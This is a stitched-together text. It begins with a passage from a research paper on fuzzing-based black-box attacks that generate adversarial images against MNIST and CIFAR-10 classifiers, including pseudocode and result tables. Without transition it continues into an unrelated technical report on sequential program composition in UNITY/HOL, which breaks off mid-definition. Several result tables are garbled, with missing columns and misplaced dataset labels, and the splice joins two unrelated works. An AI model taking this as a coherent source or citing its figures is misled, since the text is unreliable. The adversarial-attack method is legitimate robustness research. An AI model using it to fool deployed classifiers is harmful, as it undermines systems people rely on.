AdvFuzzer The logic for AdvFuzzer is presented in Algorithm 1. It generates an adversarial example $img_{adv}$ as output, and takes a target model $f$, an $isTargeted$ parameter, a source image $img_s$, a guidance image $img_g$, and attack guidance strategy $k$ as inputs. For every iteration of the while loop, a random main step is taken by selecting a perturbation $\epsilon$ based on the attack guidance strategy $k$ (Line 4). We adopt an $L_0$ strategy which changes a random pixel in the perturbation $\epsilon$ image to the corresponding difference pixel value between the guidance image and the current image. Note that other strategies based on $L_\infty$ and $L_2$ could also be applied, but we found the $L_0$ strategy to be the most effective. If the current image reaches the attack goal, a medium-level LocalFuzzer is applied to explore the nearby space for potentially generating more successful adversarial examples. Otherwise, a small-level LocalFuzzer is used to check if some successful adversarial examples could still be found nearby. The while loop ends whenever a successful example is found or the number of steps reaches the maximum number of steps, which is the $L_0$ distance between the source image and the guidance image. It will then fine-tune a random successful adversarial example in the adversarial example set $S_{adv}$ by using a walk_back fuzzer. The walk_back fuzzer works in a similar manner to LocalFuzzer as described below.
Algorithm 1 AdvFuzzer: generating an adversarial example using fuzzing
Input: $f$: a black-box model,
$\text{isTargeted}$: True for targeted attack and False for untargeted attack,
$\text{img}_s$: a source image with class $s$, i.e., $f(\text{img}_s) = s$,
$\text{img}_g$: a guidance image with $f(\text{img}_g) = t$ for targeted attack
or $f(\text{img}_g) \neq s$ for untargeted attack,
$k$: attack guidance, e.g., based on $L_0$ or $L_\infty$ distance.
Output: $\text{img}_{adv}$: an adversarial example from a successful adversarial examples set $S_{adv}$.
1: $S_{adv} \leftarrow \emptyset$
2: $\text{img}_{cur} \leftarrow \text{img}_s$
3: while $\text{size}(S_{adv}) == 0$ and $\text{num} \_\text{steps} < \text{MAX} \_\text{STEPS}$ do
4: $\epsilon = \text{SelectPerturbationAlongMainDirection}(\text{img}_{cur}, \text{img}_g, k)$
5: $\text{img}_{cur} = \text{img}_{cur} + \epsilon$
6: if ($\text{isTargeted}$ and $f(\text{img}_{cur}) == t$) or (not $\text{isTargeted}$ and $f(\text{img}_{cur}) \neq s$) then
7: $S_{adv} = S_{adv} \cup \text{LocalFuzzer}(f, \text{img}_{cur}, s, t, \text{isTargeted}, \text{medium} \_\text{level})$
8: else
9: $S_{adv} = S_{adv} \cup \text{LocalFuzzer}(f, \text{img}_{cur}, s, t, \text{isTargeted}, \text{small} \_\text{level})$
10: $\text{num} \_\text{steps} += 1$
11: $\text{img}_{adv} = \text{walk} \_\text{back}(f, \text{img}_s, S_{adv}[0], s, t, \text{medium} \_\text{level}, \text{isTargeted})$
12: return $\text{img}_{adv}$
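As an illustration of the $L_0$ guidance strategy on Line 4, the following sketch (ours; images are flattened to lists of pixel values for simplicity) copies one randomly chosen still-differing pixel from the guidance image per main step:

```python
import random

def l0_main_step(img_cur, img_guide):
    """One AdvFuzzer main step under the L0 guidance strategy: copy a
    single randomly chosen pixel that still differs from the guidance
    image. Images are flat lists of pixel values here."""
    diff_idx = [i for i, (a, b) in enumerate(zip(img_cur, img_guide)) if a != b]
    if not diff_idx:
        return img_cur  # already identical to the guidance image
    i = random.choice(diff_idx)
    stepped = list(img_cur)
    stepped[i] = img_guide[i]
    return stepped
```

Each main step reduces the $L_0$ distance to the guidance image by exactly one, which is why the maximum number of steps equals that distance.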
LocalFuzzer LocalFuzzer is described in Algorithm 2. Its goal is to generate a set of adversarial examples potentially around an input image $\text{img}$. An adversarial example set $S_{adv}$ and a set $S_{all}$ including all examples are maintained as seed pools. A candidate seed is randomly selected and then mutated. For an input image, fuzzer_level controls the total number of mutated images to
be generated. In each iteration, a random perturbation based mutation is applied. The mutation function randomly selects one pixel of an image and changes its value to any real number between 0 and 1. The mutated image is then added to the adversarial set $S_{adv}$ if it meets the attack goal. The loop stops once the fuzzer level is reached and the adversarial image set $S_{adv}$ (could be empty) is returned. The difference between a LocalFuzzer and a walk back fuzzer is the mutation. Instead of changing one random pixel to a random value between 0 and 1, the walk back fuzzer mutates an image by randomly changing some pixel values of a current image closer or directly to that of the source image.
\begin{algorithm}
\caption{LocalFuzzer: generating a set of adversarial examples using fuzzing locally}
\begin{algorithmic}[1]
\Input \textit{f}: a black-box model,
\hspace{1em} \textit{img}: an input image,
\hspace{1em} \textit{s}: source image class,
\hspace{1em} \textit{t}: target class,
\hspace{1em} \textit{isTargeted}: True for targeted attack and False for untargeted attack,
\hspace{1em} \textit{fuzzer level}: level of local fuzzing.
\Output $S_{adv}$: a set of successful adversarial examples.
1: $S_{adv} \leftarrow \emptyset$
2: $S_{all} \leftarrow \{\textit{img}\}$
3: if (\textit{isTargeted} and $f(\textit{img}) == t$) or (not \textit{isTargeted} and $f(\textit{img}) \neq s$) then
4: $S_{adv} = S_{adv} \cup \{\textit{img}\}$
5: for $i$ from 1 to \textit{fuzzer level} do
6: \textbf{if} $S_{adv} \neq \emptyset$ then
7: $\textit{img}_{rand} = \text{RandomSelect}(S_{adv})$
8: \textbf{else}
9: $\textit{img}_{rand} = \text{RandomSelect}(S_{all})$
10: $\textit{img}_{mut} = \text{mutation}(\textit{img}_{rand})$
11: if (\textit{isTargeted} and $f(\textit{img}_{mut}) == t$) or (not \textit{isTargeted} and $f(\textit{img}_{mut}) \neq s$) then
12: $S_{adv} = S_{adv} \cup \{\textit{img}_{mut}\}$
13: $S_{all} = S_{all} \cup \{\textit{img}_{mut}\}$
14: \textbf{return} $S_{adv}$
\end{algorithmic}
\end{algorithm}
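A compact Python sketch of Algorithm 2 (ours, with flat pixel lists in $[0, 1]$ standing in for images) makes the seed-pool preference for already-adversarial examples explicit:

```python
import random

def local_fuzz(f, img, source_class, target_class, targeted, fuzzer_level):
    """Sketch of LocalFuzzer: mutate one random pixel at a time and
    collect every mutant that meets the attack goal."""
    def ok(x):
        label = f(x)
        return label == target_class if targeted else label != source_class

    s_adv = [list(img)] if ok(img) else []
    s_all = [list(img)]
    for _ in range(fuzzer_level):
        # Prefer seeds that are already adversarial, as in Algorithm 2.
        seed = random.choice(s_adv if s_adv else s_all)
        mutant = list(seed)
        # Mutation: set one random pixel to a random value in [0, 1).
        mutant[random.randrange(len(mutant))] = random.random()
        if ok(mutant):
            s_adv.append(mutant)
        s_all.append(mutant)
    return s_adv
```

The returned set may be empty; `fuzzer_level` bounds the number of model queries this local exploration spends.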
4 Experimental Results
We now evaluate the feasibility and effectiveness of our fuzzing attacks. We use two standard datasets: MNIST [LeCun & Cortes, 2010] and CIFAR-10 [Krizhevsky, 2009]. We compare fuzzing attacks with four attacks including Boundary attack [Brendel et al., 2017], Opt attack [Cheng et al., 2019], and C&W $L_0$ and $L_2$ attacks [Carlini & Wagner, 2017]. Note that C&W attacks are white-box attacks. All the experiments are performed for both targeted attacks and untargeted attacks. Label-only attack [Ilyas et al., 2018] was evaluated by the authors only on ImageNet and we could not find its code for MNIST and CIFAR-10, so we did not include it in our evaluation.
To have a fair comparison, we adopt the same network architecture for MNIST and CIFAR-10 used in [Carlini & Wagner, 2017]. Note that [Brendel et al., 2017] also used the same network architecture, which has two convolution layers followed by a max-pooling layer, two convolution layers, a max-pooling layer, two fully-connected layers, and a softmax layer. Using the same parameters as reported in [Carlini & Wagner, 2017], we obtained 99.49% and 82.71% test accuracy for MNIST and CIFAR-10, respectively.
4.1 Overall Results
From the test set of each dataset, we randomly selected 10 images for each of the 10 classes. These same 100 images are used as source examples for all attacks. We use white-box C&W $L_0$ and $L_2$
attack\(^1\) as baselines, and use Boundary attack\(^2\) and Opt attack\(^3\) for comparison. We adopt the default parameters for the four attacks from their corresponding original implementations. As for fuzzing attacks, we use three different small LocalFuzzer levels including 100, 300, and 500. We report the average \(L_0\) and \(L_2\) distances between a successful adversarial example and a source image, and the average number of queries for successful adversarial examples generated from 100 attack attempts. \(L_0\) measures the number of different pixels between two images and \(L_2\) is the Euclidean distance. Using the default attack parameters in the corresponding implementations, Opt attack, C&W attacks, and our fuzzing attacks can achieve 100\% success rates while Boundary attack achieves between 90\% and 100\% success rates. Note that due to the randomness of our fuzzing attacks, the results could vary in a certain range from run to run.
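For concreteness, the two distance metrics, treating images as flat pixel lists, can be computed as follows (a sketch, ours):

```python
import math

def l0_distance(a, b):
    """Number of pixel positions where the two images differ."""
    return sum(x != y for x, y in zip(a, b))

def l2_distance(a, b):
    """Euclidean distance between two images (as flat pixel lists)."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))
```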
**Untargeted Attacks** An untargeted attack is successful when an adversarial image is classified as any class other than the source class. Although the guidance images in untargeted attacks could be any randomly generated images or legitimate images classified as any class other than the source class, we use the same guidance images in the targeted attacks for consistency. Also, we found that there is not much difference between using a randomly generated guidance image and a legitimate image. The results for untargeted attacks are summarized in Table 1. While Boundary attack and Opt attack can generate successful adversarial examples with smaller \(L_2\) distance compared to C&W attacks, they tend to change most of the pixels in an image since their average \(L_0\) is higher. However, adversarial examples generated from our fuzzing attacks have larger \(L_2\) distance but smaller \(L_0\) distance. The results are comparable to C&W \(L_0\) attack. The first row in Figure 2 shows the successful adversarial examples from the untargeted fuzzing attacks on MNIST and CIFAR-10. The perturbations on CIFAR-10 are largely imperceptible by human eyes while they are more obvious on MNIST. This is mostly due to the uniform dark background of MNIST images \(^4\) especially when \(L_0\) is reduced and \(L_2\) is increased. What we want to highlight is that the average number of queries used by our fuzzing attacks is significantly decreased by 10-18 folds and 2-5 folds for MNIST and CIFAR-10, respectively.
### Table 1: Results for Untargeted Attacks
<table>
<thead>
<tr>
<th>Attack</th>
<th>MNIST Avg $L_0$</th>
<th>MNIST Avg $L_2$</th>
</tr>
</thead>
<tbody>
<tr>
<td>Boundary attack</td>
<td>769</td>
<td>1.1454</td>
</tr>
<tr>
<td>Opt attack</td>
<td>784</td>
<td>1.0839</td>
</tr>
<tr>
<td>C&W (L_0) attack</td>
<td>10</td>
<td>2.5963</td>
</tr>
<tr>
<td>C&W (L_2) attack</td>
<td>749</td>
<td>1.4653</td>
</tr>
<tr>
<td>Fuzzing attack 100</td>
<td>19</td>
<td>2.5536</td>
</tr>
<tr>
<td>Fuzzing attack 300</td>
<td>19</td>
<td>2.5041</td>
</tr>
<tr>
<td>Fuzzing attack 500</td>
<td>19</td>
<td>2.4525</td>
</tr>
</tbody>
</table>
**Targeted Attacks** We consider next-label targeted attacks \(^5\) where the adversarial goal is for an adversarial example to be misclassified as a target class \(y_t\) such that \(y_t = (y + 1) \bmod 10\), where \(y\) is the source class. The results for targeted attacks are shown in Table 2. The second row in Figure 2 shows the successful adversarial examples from the targeted fuzzing attacks on MNIST and CIFAR-10. The perturbations for targeted attacks are visually larger
---
\(^1\)https://github.com/carlini/nn_robust_attacks
\(^2\)https://github.com/bethgelab/foolbox
\(^3\)https://github.com/LeMinhThong/blackbox-attack
---
Figure 2: Successful adversarial examples from fuzzing attacks on MNIST and CIFAR-10
Table 2: Results for Targeted Attacks
<table>
<thead>
<tr>
<th></th>
<th>MNIST</th>
<th>CIFAR-10</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Avg $L_0$</td>
<td>Avg $L_2$</td>
</tr>
<tr>
<td>Boundary attack</td>
<td>773</td>
<td>1.8393</td>
</tr>
<tr>
<td>Opt attack</td>
<td>784</td>
<td>1.9040</td>
</tr>
<tr>
<td>C&W $L_0$ attack</td>
<td>26</td>
<td>3.6744</td>
</tr>
<tr>
<td>C&W $L_2$ attack</td>
<td>742</td>
<td>2.1752</td>
</tr>
<tr>
<td>Fuzzing attack 100</td>
<td>43</td>
<td>3.3925</td>
</tr>
<tr>
<td>Fuzzing attack 300</td>
<td>42</td>
<td>3.3553</td>
</tr>
<tr>
<td>Fuzzing attack 500</td>
<td>41</td>
<td>3.3690</td>
</tr>
</tbody>
</table>
than the perturbations for untargeted attacks. Similarly, the fuzzing attack decreases the average $L_0$ distance while increasing the average $L_2$ distance. The fuzzing attacks also reduce the average number of queries by a factor of 8–9 on MNIST and 2–2.5 on CIFAR-10. Note that it is harder to find successful adversarial examples using LocalFuzzer levels of 300 and 500 on CIFAR-10 because of the larger feature space compared to MNIST and the smaller adversarial space in targeted attacks compared to untargeted attacks.
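The next-label target rule \(y_t = (y + 1) \bmod 10\) used in these experiments is trivial to implement; a sketch (the function name is ours):

```python
def next_label_target(y, num_classes=10):
    """Target class for a next-label targeted attack: y_t = (y + 1) mod num_classes."""
    return (y + 1) % num_classes

# Source classes 0..9 map to targets 1..9 and then wrap around to 0.
print([next_label_target(y) for y in range(10)])  # [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
```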
Overall, the randomness of the fuzzing approach helps to reduce the average number of queries and the $L_0$ distance at the cost of a small increase in $L_2$ distance. The experimental results show that fuzzing attacks are feasible and effective. They could potentially be strengthened further by improving the fuzzing process, e.g., seed selection, main-direction selection, step selection, and mutation-operator selection.
4.2 RESULTS ON APPLYING LOCALFUZZER ON SUCCESSFUL ADVERSARIAL EXAMPLES
We now apply LocalFuzzer on successful adversarial examples generated from Boundary attack, Opt attack, and our fuzzing attacks to more intensively evaluate the bulk generation capability of LocalFuzzer. We leverage the successful adversarial examples from the experiments in Section 4.1 for both untargeted and targeted attacks. For fuzzing attacks, we use the adversarial examples generated with a LocalFuzzer level of 500 which are shown in the third row of fuzzing attacks in both Table 1 and Table 2. Three experiments with different LocalFuzzer levels of 100, 1,000, and 5,000 are performed.
We report six metrics: M1, the success bulk generation rate (i.e., the percentage of bulk runs returning successful examples); M2, the average number of successful examples generated in a bulk run; M3, the success bulk generation rate with lower $L_2$ (i.e., the percentage of successful bulk runs returning adversarial examples with $L_2$ lower than that of the seed image); M4, the average number of successful examples with lower $L_2$ in a bulk run; M5, the average $L_2$ decrease of successful examples with lower $L_2$; and M6, the average $L_2$ decrease rate of successful examples with lower $L_2$.
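Assuming each bulk run is summarised by the $L_2$ distances of the successful examples it produced, the six metrics could be computed roughly as follows (a sketch; the paper's exact bookkeeping may differ):

```python
def bulk_metrics(runs, seed_l2):
    """Metrics M1-M6 for LocalFuzzer bulk runs (illustrative sketch).

    `runs` is a list of bulk runs; each run is the list of L2 distances of
    the successful adversarial examples that run produced (empty = failure).
    `seed_l2` is the L2 distance of the seed adversarial example.
    """
    success = [r for r in runs if r]
    m1 = len(success) / len(runs)                     # M1: success bulk generation rate
    m2 = sum(len(r) for r in success) / max(len(success), 1)   # M2: avg successes per run
    lower = [[d for d in r if d < seed_l2] for r in success]
    lower = [r for r in lower if r]                   # runs that also lowered L2
    m3 = len(lower) / max(len(success), 1)            # M3: rate of runs with lower L2
    m4 = sum(len(r) for r in lower) / max(len(lower), 1)       # M4: avg lower-L2 successes
    drops = [seed_l2 - d for r in lower for d in r]
    m5 = sum(drops) / max(len(drops), 1)              # M5: average decreased L2
    m6 = m5 / seed_l2                                 # M6: average L2 decreasing rate
    return m1, m2, m3, m4, m5, m6

# Two bulk runs against a seed with L2 = 1.5
print(bulk_metrics([[1.0, 1.4], [1.6]], seed_l2=1.5))
```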
The results for untargeted and targeted attacks are presented in Table 3 and Table 4, respectively. We achieve a 100% success bulk generation rate in all experiments, which indicates the great benefit of the bulk generation capability of LocalFuzzer. It also demonstrates that the “optimized” adversarial examples from Boundary attack and Opt attack can be refined further. LocalFuzzer uses a relatively small number of queries (i.e., 100, 1,000, and 5,000 in the experiments) compared with what Boundary attack and Opt attack originally required, yet immediately generates more successful adversarial examples, even with smaller $L_2$ distance from the source example. These results indicate that LocalFuzzer itself can be an independent and useful tool to augment many adversarial example generation algorithms.
5 CONCLUSION AND DISCUSSION
Inspired by the similarities between attacking a machine learning model and testing the correctness or security bug of a program, we proposed fuzzing-based hard-label black-box attacks to generate adversarial examples. We designed two fuzzers, AdvFuzzer and LocalFuzzer, to explore multiple random paths between a source image and a guidance image, and the nearby space of each step
Table 3: Bulking successful examples from untargeted attacks
<table>
<thead>
<tr>
<th>Attack</th>
<th>M1</th>
<th>M2</th>
<th>M3</th>
<th>M4</th>
<th>M5</th>
<th>M6</th>
</tr>
</thead>
<tbody>
<tr>
<td>Boundary Attack</td>
<td>100%</td>
<td>63</td>
<td>66.00%</td>
<td>16</td>
<td>2.45e-3</td>
<td>0.23%</td>
</tr>
<tr>
<td>MNIST</td>
<td>100%</td>
<td>736</td>
<td>58.23%</td>
<td>56</td>
<td>4.93e-3</td>
<td>0.48%</td>
</tr>
<tr>
<td>Opt Attack</td>
<td>100%</td>
<td>3,888</td>
<td>73.00%</td>
<td>112</td>
<td>5.64e-3</td>
<td>0.56%</td>
</tr>
<tr>
<td>Fuzzing Attack</td>
<td>100%</td>
<td>92</td>
<td>67.00%</td>
<td>7</td>
<td>1.97e-2</td>
<td>0.90%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>939</td>
<td>100%</td>
<td>75</td>
<td>3.99e-2</td>
<td>1.81%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>4,730</td>
<td>100%</td>
<td>425</td>
<td>3.99e-2</td>
<td>1.81%</td>
</tr>
</tbody>
</table>
Table 4: Bulking successful examples from targeted attacks
<table>
<thead>
<tr>
<th>Attack</th>
<th>M1</th>
<th>M2</th>
<th>M3</th>
<th>M4</th>
<th>M5</th>
<th>M6</th>
</tr>
</thead>
<tbody>
<tr>
<td>Boundary Attack</td>
<td>100%</td>
<td>57</td>
<td>3.26%</td>
<td>3</td>
<td>0.14e-3</td>
<td>0.07%</td>
</tr>
<tr>
<td>MNIST</td>
<td>100%</td>
<td>676</td>
<td>6.52%</td>
<td>4</td>
<td>0.17e-3</td>
<td>0.07%</td>
</tr>
<tr>
<td>Opt Attack</td>
<td>100%</td>
<td>3,726</td>
<td>9.78%</td>
<td>8</td>
<td>0.29e-3</td>
<td>0.10%</td>
</tr>
<tr>
<td>Fuzzing Attack</td>
<td>100%</td>
<td>69</td>
<td>2.00%</td>
<td>2</td>
<td>0.15e-3</td>
<td>0.04%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>757</td>
<td>7.00%</td>
<td>3</td>
<td>0.18e-3</td>
<td>0.06%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>3,936</td>
<td>10.00%</td>
<td>4</td>
<td>0.12e-3</td>
<td>0.04%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>93</td>
<td>24.21%</td>
<td>8</td>
<td>6.34e-3</td>
<td>0.42%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>943</td>
<td>58.95%</td>
<td>54</td>
<td>8.93e-3</td>
<td>0.56%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>4,774</td>
<td>80.00%</td>
<td>258</td>
<td>3.99e-2</td>
<td>1.81%</td>
</tr>
</tbody>
</table>
along the way. We evaluated our fuzzing attacks using MNIST and CIFAR-10 datasets, and compared ours with four existing attacks including Boundary attack, Opt attack, and C&W $L_0$ and $L_2$ attacks. The experimental results demonstrated that our fuzzing attacks are feasible and effective. Moreover, LocalFuzzer has the bulk successful example generation capability and distance refinement capability on adversarial examples generated from different attack methods. We would recommend LocalFuzzer as an independent and useful tool for augmenting many adversarial example generation algorithms.
Our work provides evidence for adopting fuzz testing in the adversarial example generation domain. Although the randomness advantage of the fuzzing attacks helps reduce the number of model queries, one limitation of our attacks is that they sacrifice the $L_2$ distance to a small extent. We expect that further improvements to the fuzzing process could be explored to construct more powerful
fuzzing-based attacks. For example, potential ways for improvement could be a better guidance strategy in the main direction selection, a refined seed selection process, a refined mutation function, etc. We are working on improving our approach and we hope our fuzzing attacks could inspire more related research in the future.
REFERENCES
Yann LeCun and Corinna Cortes. MNIST handwritten digit database. 2010.
Sequential program composition in UNITY
Tanja Vos and Doaitse Swierstra
Utrecht University, Department of Computer science
e-mail: \{tanja, doaitse\}@cs.uu.nl
February 28, 2000
1 Introduction
Large distributed applications are composed of basic blocks, by using composition operators. In an ideal situation, one should be able to develop and verify each of these basic components by itself, using compositionality theorems of the respective composition operators stating that properties of a composite program can be proved by proving properties of its components.
Generally, two forms of distributed program composition can be distinguished: parallel composition and sequential composition. Parallel composition is standard in UNITY [CM89], and is used when two distributed component-programs need to cooperate in one way or another. Compositionality theorems of parallel composition on general progress properties are extensively studied in [CM89, Sin89a, Pra95]. Sequential composition of UNITY programs is not part of core UNITY [CM89]. It can however be very useful when we want a program to work with the results of another program. For example, for the Propagation of Information with Feedback (PIF) protocol [Seg83]:
elect a leader \(\triangleright\) let the leader be the starter of the PIF protocol
In [Mis90b], a brief and intuitive characterisation of sequential composition is given. In this technical report, we shall formally define and model sequential program composition within the HOL-UNITY embedding described in [Pra95, Vos00]. In order to do so, we introduce a new type of UNITY programs, called $\text{UNITY}^+$ programs, which consist of sequentially composed UNITY programs. The semantics of a $\text{UNITY}^+$ program is then defined in terms of a UNITY program that models the desired behaviour of the sequential composition. Finally, safety and progress operators are defined for these $\text{UNITY}^+$ programs, and compositionality theorems are derived. For those readers not familiar with UNITY and its embedding in HOL, Appendix A contains a brief overview. For those readers that are familiar with UNITY, we have compiled an extensive index that should enable the reader to start reading this technical report, looking up desired definitions in a demand-driven way.
2 Semantics of sequential program composition
In [Mis90b], sequential composition of programs $P \triangleright Q$ is defined intuitively in operational terms as follows. Program $P$’s execution is started. If a fixed-point state of $P$ is reached, the execution of $Q$ is started from that state. In this technical report, we generalise this by parametrising $\triangleright$ with some state-predicate, and interpreting $P \triangleright_r Q$ as follows. Program $P$’s execution is started. If a predicate $r$ holds in some state during the execution of $P$, the execution of $Q$ is started from that state. Consequently, if $r$ is a fixed-point of $P$, then our operational intuition of $\triangleright_r$ corresponds to that of [Mis90b].
In order to formalise the $\triangleright_r$-operator, we have to find a way to enforce that:
- the execution of $P$ is stopped when $r$ holds
- the execution of $Q$ is started in exactly that state where $r$ started to hold in $P$
In [Mis90b], $r$ is assumed to be a fixed-point of $P$, and, as a consequence, if $r$ holds, then the execution of $P$ has effectively stopped. Moreover, in [Mis90b] it is implicitly assumed that the execution of a UNITY program is started only when its initial condition is satisfied, and since only those programs $Q$ that have $P$’s fixed-point as their initial condition are considered it is ensured that once $P$ stops, $Q$ can start executing. In our case, however, it is not as simple as this. First, we decided to generalise our $\triangleright$ operator by parametrising it with some state-predicate which is not necessarily $P$’s fixed-point. Second, in our HOL-UNITY embedding, where a program’s progress properties are proved independently from its initial condition [Pra95], we cannot use this approach from [Mis90b] to ensure that $Q$ is started in exactly that state where $r$ started to hold in $P$. Consequently, we have to deal with these two aspects explicitly when formally defining the semantics of our $\triangleright$ operator. In order to explain the approach we have taken, we use the two UNITY programs $P$ and $Q$ from below.
<table>
<thead>
<tr>
<th>prog $P$</th>
<th>prog $Q$</th>
</tr>
</thead>
<tbody>
<tr>
<td>read $\{x\}$</td>
<td>read $\{x\}$</td>
</tr>
<tr>
<td>write $\{x\}$</td>
<td>write $\{y\}$</td>
</tr>
<tr>
<td>init $x = 0$</td>
<td>init true</td>
</tr>
<tr>
<td>assign if $x \geq 0$ then $x := x + 1$</td>
<td>assign $y := x$</td>
</tr>
</tbody>
</table>
Obviously, we need to define the semantics of $P \triangleright_r Q$, such that:
• as soon as predicate $r$ holds, the guards of all of $P$’s actions are disabled and remain disabled forever (i.e. we transform $P$ such that $r$ becomes a fixed-point of the transformed program).
• when $r$ is not yet satisfied during the execution of $P$, all guards of $Q$ are disabled, and as soon as $r$ becomes true the guards of $Q$’s actions are enabled as far as this is allowed by $Q$ itself.
In order to achieve this, we introduce a fresh variable $pc$, the value of which indicates which program (i.e. $P$ or $Q$) is allowed to execute. We make sure that once $r$ becomes true the value of the $pc$ is adjusted as to ensure that the execution of $P$ is stopped and that of $Q$ is started. Subsequently, we transform $P$ and $Q$ by strengthening the guards of all their actions such that these are only enabled when the value of the $pc$ allows them. Moreover, we strengthen the guards of all actions in the programs $P$ with $\neg r$ such that these actions immediately become disabled when $r$ becomes true (i.e. $r$ becomes a fixed-point). Finally, we compose these transformations using parallel composition. For programs $P$ and $Q$, this results in the following semantics of $P \triangleright_r Q$:
$$
\begin{align*}
\text{prog} &\quad P \triangleright_r Q \\
\text{read} &\quad \{x\} \\
\text{write} &\quad \{x, y\} \\
\text{init} &\quad (x = 0) \land (pc = 0) \\
\text{assign} &\quad \text{if } (x \geq 0) \land (pc = 0) \land \neg r \text{ then } x := x + 1 \\
&\quad [\,]\ \text{if } (pc = 0) \land r \text{ then } pc := pc + 1 \\
&\quad [\,]\ \text{if } (pc = 1) \text{ then } y := x
\end{align*}
$$
This evidently gives the desired effect. If $r$ becomes true, the guard of $P$’s action is immediately disabled since it contains $(\neg r)$. Eventually the $pc$ will be incremented and become 1. As a result, $Q$ can start executing, and since the $pc$ will never change again $P$ has stopped.
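The guarded-action construction can be simulated concretely. The sketch below is ours, not the report's HOL formalisation: it instantiates the hand-off predicate as $r = (x \geq 5)$ so the hand-off is observable, and uses round-robin scheduling as one (weakly fair) schedule.

```python
def run_seq_composition(steps=30):
    """Simulate the semantics of P ▷_r Q for the example programs:
    P: if x >= 0 then x := x + 1, with r = (x >= 5) (our choice); Q: y := x.
    Guards are strengthened with pc tests exactly as in the construction."""
    state = {"x": 0, "y": None, "pc": 0}
    r = lambda s: s["x"] >= 5  # the hand-off predicate (an assumption for the demo)
    actions = [
        # P's action, guarded by pc = 0 and ¬r
        lambda s: s.update(x=s["x"] + 1) if s["x"] >= 0 and s["pc"] == 0 and not r(s) else None,
        # the hand-off action: increments pc once r holds
        lambda s: s.update(pc=s["pc"] + 1) if s["pc"] == 0 and r(s) else None,
        # Q's action, guarded by pc = 1
        lambda s: s.update(y=s["x"]) if s["pc"] == 1 else None,
    ]
    for i in range(steps):  # round-robin is one fair schedule
        actions[i % 3](state)
    return state

print(run_seq_composition())  # {'x': 5, 'y': 5, 'pc': 1}
```

Once $x$ reaches 5, $P$'s action is disabled for good, the $pc$ is bumped to 1, and $Q$ copies $x$ into $y$, matching the intended operational reading of $P \triangleright_r Q$.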
Now, we have laid the foundations of how we will define the semantics of $\triangleright_r$. Subsequently, we have to determine how we handle sequences of sequential compositions:
$P \triangleright_r Q \triangleright_s H$
A property following naturally from the intuitive interpretation of sequential composition, is that of associativity. Consequently, we want to define the semantics of $\triangleright_r$ such that:
$$P \triangleright_r Q \triangleright_s H = (P \triangleright_r Q) \triangleright_s H = P \triangleright_r (Q \triangleright_s H)$$
From the discussion above, we can derive that the following program captures the intended meaning of these sequences:
$$\begin{align*}
\text{prog} & \quad P \triangleright_r Q \triangleright_s H \\
\text{read} & \quad rP \cup rQ \cup rH \\
\text{write} & \quad wP \cup wQ \cup wH \\
\text{init} & \quad \text{ini}P \land \text{ini}Q \land \text{ini}H \land (pc = 0) \\
\text{assign if} & \quad (pc = 0) \land \lnot r \text{ then } P \\
& \quad \quad \text{if } (pc = 0) \land r \text{ then } pc := pc + 1 \\
& \quad \quad \text{if } (pc = 1) \land \lnot s \text{ then } Q \\
& \quad \quad \text{if } (pc = 1) \land s \text{ then } pc := pc + 1 \\
& \quad \quad \text{if } (pc = 2) \text{ then } H
\end{align*}$$
When defining the semantics of $\triangleright_r$ such that the latter is associative, we need to make sure that the semantics of $(P \triangleright_r Q) \triangleright_s H$ as well as $P \triangleright_r (Q \triangleright_s H)$ are equal to the program presented above. Consequently, since we allow sequential composition of any (finite) number of programs, a shallow embedding of $\triangleright$ is inadequate to ensure that the right values of $pc$ are used when strengthening the guards. Therefore, we define the $\triangleright$ operator using a deep embedding\(^1\). Since a sequence of sequential compositions consists of “simple” UNITY programs (i.e. those of type $\text{Uprog}$ (see page 10)) composed with the $\triangleright$ operator, we define the abstract syntax of $\text{UNITY}^+$ programs by the following recursive data type:
Definition 2.1 Type definition
\[
\text{Uprog}^+ = \text{Simple}.\text{Uprog} \mid \text{Uprog}^+ \triangleright_{\text{Expr}} \text{Uprog}^+
\]
Now we can define the semantics and other properties of sequential composition as recursive functions over this data type. For example, the write variables of a $\text{UNITY}^+$ program can be obtained as follows (we overload the $w$ destructor from Appendix A.2):
\(^1\)In a deep embedding, the abstract syntax of the language is defined as a type in the HOL logic, and the semantics is defined as recursive functions over this type.
Definition 2.2 Write variables of a UNITY\(^+\) program
\[
\begin{align*}
\text{w}(\text{Simple}.P) &= \text{w}P \\
\text{w}(P^+ \triangleright_r Q^+) &= \text{w}P^+ \cup \text{w}Q^+
\end{align*}
\]
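The recursive data type and the destructor $\text{w}$ transcribe almost literally into a functional-style sketch (ours; the guard expressions are modelled as opaque values):

```python
from dataclasses import dataclass
from typing import FrozenSet, Union

@dataclass(frozen=True)
class Simple:
    """A simple UNITY program, reduced to its name and write variables."""
    name: str
    writes: FrozenSet[str]

@dataclass(frozen=True)
class Seq:
    """P+ ▷_r Q+; the state-predicate r is kept as an opaque value."""
    left: "UprogPlus"
    guard: object
    right: "UprogPlus"

UprogPlus = Union[Simple, Seq]

def w(u: UprogPlus) -> FrozenSet[str]:
    """Write variables, by recursion over the data type (as in Definition 2.2)."""
    if isinstance(u, Simple):
        return u.writes
    return w(u.left) | w(u.right)

p = Simple("P", frozenset({"x"}))
q = Simple("Q", frozenset({"y"}))
print(sorted(w(Seq(p, "x >= 5", q))))  # ['x', 'y']
```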
Continuing with the semantics, suppose we need to define the semantics of \(P^+ \triangleright_r Q^+\), where \(P^+\) and \(Q^+\) can consist of arbitrary sequential compositions. The first value of the \(\text{pc}\) used in the semantics of \(Q^+\) has to be the successor of the maximal \(\text{pc}\) used in the semantics of \(P^+\). Moreover, only the guards of the last “simple” UNITY program in \(P^+\)’s sequence have to be strengthened with the negation of the state-predicate \(r\). In order to achieve this we define a transformation function \(\text{tr}\) that, given an arbitrary UNITY\(^+\) program \(U^+\) and some start value \(n\) for the \(\text{pc}\) (i.e. if the \(\text{pc}\) is \(n\), then the first Simple UNITY program in the sequence \(U^+\) is allowed to execute), returns a tuple like:
\[
(U \in \text{Expr} \rightarrow \text{Uprog},\ m \in \text{num})
\]
